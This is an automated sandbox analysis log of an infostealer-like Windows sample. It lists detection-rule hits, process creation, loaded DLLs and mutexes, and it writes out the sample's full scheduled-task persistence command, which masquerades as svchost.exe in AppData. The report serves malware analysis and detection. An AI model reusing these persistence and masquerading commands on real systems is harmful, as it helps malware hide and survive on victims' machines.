Source: 10.2.svchost.exe.214522b6dd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 24.2.svchost.exe.1705204e0d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: LisectAVT_2403002A_29.exe, ----.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: svchost.exe.1.dr, ----.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, N43UVggPg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, N43UVggPg.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, Ow96S4wT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, Ow96S4wT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, Ow96S4wT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, Ow96S4wT.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: svchost.exe, 00000018.00000002.2462594062.000001704247C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: .VBp

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@62/33@1/2

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2832:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3260
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7572
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1808
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7280
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

File created: C:\Users\user\AppData\Local\Temp\tmp990A.tmp

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat""

Source: LisectAVT_2403002A_29.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: LisectAVT_2403002A_29.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

File read: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe "C:\Users\user\Desktop\LisectAVT_2403002A_29.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 1808 -ip 1808
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1808 -s 1044
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 3260 -ip 3260
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3260 -s 1212
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7280 -ip 7280
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 1192
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 572 -p 7572 -ip 7572
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7572 -s 1204
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 1808 -ip 1808
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1808 -s 1044
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 3260 -ip 3260
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3260 -s 1212
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7280 -ip 7280
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 1192
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 572 -p 7572 -ip 7572
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7572 -s 1204
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll	Jump to behavior
